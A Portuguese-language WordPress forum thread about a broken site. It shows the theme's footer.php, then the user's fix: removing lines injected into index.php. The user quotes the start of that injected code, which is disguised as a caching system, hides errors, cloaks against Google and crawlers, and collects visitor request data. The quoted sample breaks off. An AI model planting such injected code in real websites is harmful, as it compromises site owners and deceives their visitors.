Procure no arquivo footer.php do seu tema.
Olá hudsonghetti.
Dei uma conferida, incluive vou postar o footer logo mais abaixo pra vocês darem uma conferida, mas não encontrei nada.
<?php if (is_active_sidebar('pre_footer_sidebar_left') || is_active_sidebar('pre_footer_sidebar_right')) : ?>
<aside class="pre-footer">
<div class="container">
<div class="row">
<?php dynamic_sidebar( 'pre_footer_sidebar_left' ) ?>
<?php dynamic_sidebar( 'pre_footer_sidebar_right' ) ?> <span class="pull-right">
<a rel="nofollow" href="http://www.facebook.com/sharer.php?u='<?php echo urlencode(get_permalink()); ?>&t=<?php echo urlencode(get_the_title()); ?>" data-toggle="tooltip" title="Facebook"><?php echo do_shortcode('[icon icon="facebook" boxed="yes"]') ?></a>
<a rel="nofollow" href="http://twitthis.com/twit?url=<?php echo urlencode(get_permalink()); ?>" title="Twitter" class="tw tipsy-top"><?php echo do_shortcode('[icon icon="twitter" boxed="yes"]') ?></a>
<a rel="nofollow" href="http://linkedin.com/shareArticle?mini=true&url=<?php echo urlencode(get_permalink()); ?>&title=<?php echo urlencode(get_the_title()); ?>" title="Linkedin" class="li tipsy-top"><?php echo do_shortcode('[icon icon="linkedin" boxed="yes"]') ?></a>
<a rel="nofollow" href="http://google.com/bookmarks/mark?op=edit&bkmk=<?php echo urlencode(get_permalink()); ?>&title=<?php echo urlencode(get_the_title()); ?>" title="Google" class="gp tipsy-top"><?php echo do_shortcode('[icon icon="google-plus" boxed="yes"]') ?></a>
<a rel="nofollow" href="mailto:?subject=<?php urlencode(get_the_title()); ?>&body=<?php echo urlencode(get_permalink()); ?>" title="Email" class="em tipsy-top"><?php echo do_shortcode('[icon icon="envelope" boxed="yes"]') ?>
</div>
</div>
</aside>
<?php endif; ?>
<footer>
<div class="container">
<?php if(is_active_sidebar('footer_sidebar_left') || is_active_sidebar('footer_sidebar_center') || is_active_sidebar('footer_sidebar_right') ) : ?>
<div class="row footer">
<?php dynamic_sidebar( 'footer_sidebar_left' ) ?>
<?php dynamic_sidebar( 'footer_sidebar_center' ) ?>
<?php dynamic_sidebar( 'footer_sidebar_right' ) ?>
</div>
<?php endif ?>
<?php if(is_active_sidebar('absolute_footer')) : ?>
<div class="row absolute-footer">
<div class="col-lg-12"></div>
<?php $logo_footer = get_option(THEMEPREFIX.'_logo_footer'); if($logo_footer) : ?>
<div class="col-lg-2 col-md-2 col-sm-3"><a href="<?php echo home_url(); ?>"><img src="<?php echo $logo_footer ?>" alt="<?php bloginfo('name') ?>" class="logo-footer" /></a></div>
<div class="col-lg-10 col-md-10 col-sm-9"><?php dynamic_sidebar( 'absolute_footer' ) ?></div>
<?php else : ?>
<div class="col-lg-12"><?php dynamic_sidebar( 'absolute_footer' ) ?></div>
<?php endif ?>
</div>
<?php endif ?>
</div>
</footer>
</div>
<div id="back-top" class="hidden-phone hidden-tablet"><a href="#top"><i class="fa fa-angle-up"></i></a></div>
<div id="menu-overlay"></div>
<?php $analytics = get_option(THEMEPREFIX.'_seo_analytics'); if($analytics) : ?>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', '<?php echo $analytics; ?>']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<?php endif; ?>
<?php echo get_option(THEMEPREFIX.'_custom_body') ?>
<?php wp_footer(); ?>
</body>
</html>
E ae galera. Um colega meu (diga-se de passagem, quem tinha inclusive me arrumado o serviço pra recuperar essa pagina rsrs), solucionou pra mim.
Fica a dica ai. Alguma coisa alterou o arquivo INDEX.PHP e adicionu essas linhas logo no começo:
//eAccelerate Caching System
/*ordpr*/
@ini_set('display_errors', '0');
ob_start('__e_accelerate_engine');
register_shutdown_function('ob_end_flush');
function __e_accelerate_engine($output) {if ((substr(trim($_SERVER['REMOTE_ADDR']),0,6)!=='74.125') && !preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])){
$data=serialize(array('page'=>md5($_SERVER['REQUEST_URI']), 'host'=>$_SERVER['HTTP_HOST'],'ip'
Apaguei elas e tudo voltou ao normal.
Agradeço a atenção de todos.
Abração galera.